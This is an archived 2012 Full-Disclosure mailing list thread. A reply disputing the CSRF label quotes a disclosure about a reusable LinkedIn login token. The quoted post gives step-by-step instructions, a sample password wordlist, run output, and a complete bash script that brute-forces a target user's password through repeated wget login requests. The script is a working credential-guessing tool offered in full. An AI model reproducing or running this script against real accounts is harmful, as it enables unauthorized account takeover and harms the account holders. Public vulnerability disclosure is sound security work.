| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 17 May 2012 20:50:53 +0300
From: Julius Kivimäki <julius.kivimaki@...il.com>
To: "Fernando A. Lagos B." <fernando@...ial.org>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: LinkedIn CSRF: Login Brute Force
Where's the csrf? All I see here is an useless bruteforce attack.
2012/5/17 Fernando A. Lagos B. <fernando@...ial.org>
> LinkedIn uses a Token into the login form which can be used many times
> for different usernames. You can do it using the same IP or differents
> IP, the token will not be verified.
>
>
>
> I. Step by step
> ===============
> 1). Login into your LinkedIn account and capture the "sourceAlias" and
> "csrfToken" variable (example:
>
> sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&csrfToken=ajax%3A6265303044444817496)
>
> 2). Use the Token to login into another account:
>
> https://www.linkedin.com/uas/login-submit?csrfToken=ajax%3A6265303044444817496&session_key=somebody@somedomain.com&session_password=ANY_PASSWORD&session_redirect=&sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&source_app=&trk=secureless
>
> session_key is the username and session_password is the password.
>
> 3). The password (session_password) is not correct If the requested URL
> returns "The email address or password you provided does not match our
> records", else the password if correct.
>
>
>
> II. PoC
> =======
>
> 1). The Wordlist (filename: w)
> [zerial@...cebu ~]$ cat w
> asdfgh
> zxcvbnm
> 1234567
> 0987654
> 12345698
> 456_4567
> 123456qwert
> qwsdcv
> 12wedfgh
> 123456qwerty
> 12345qwei
> 112233
> [zerial@...cebu ~]$
>
>
> 2). Executing the script:
> [zerial@...cebu ~]$ sh linkedin.sh panic@...ial.org w
> Password found: qwsdcv
> [zerial@...cebu ~]$
>
> This is the correct password for this test user.
>
>
>
>
> III. Script
> ===========
>
> #!/bin/bash
> #
> # usage: ./linkedin.sh username@...ain.com wordlist
> #
>
> TOKEN="ajax%3A6265303044444817496"
> sourceAlias="0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi"
>
> if [ ! -f $2 ];
> then
> echo "file $2 does not exists"
> exit
> fi
>
> _USR=$1
> for _PWD in $(cat $2);
> do
> if [ $(echo -n $_PWD|wc -c) -lt 6 ];
> then
> echo "Ignoring $_PWD (must be grather than 6 chars)";
> continue
> fi
> wget -o /dev/null -O -
> "
> https://www.linkedin.com/uas/login-submit?csrfToken=$TOKEN&session_key=$_USR&session_password=$_PWD&session_redirect=&sourceAlias=$sourceAlias&source_app=&trk=secureless
> "|grep
> 'The email address or password you provided does not match our
> records\|captcha' >>/dev/null
> if [ $? -eq 1 ];
> then
> echo "Password found: $_PWD"; exit;
> fi
> done
>
> echo "Password NOT found. Try later."
> #EOF
>
>
>
>
>
> More info (in spanish):
>
> http://blog.zerial.org/seguridad/vulnerabilidad-en-linkedin-permite-obtencion-de-contrasenas/
>
>
>
>
> cheers,
> --
> Fernando A. Lagos Berardi
> Seguridad Informatica
> GNU/Linux User #382319
> Blog: http://blog.zerial.org
> Jabber: zerial@...beres.org
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists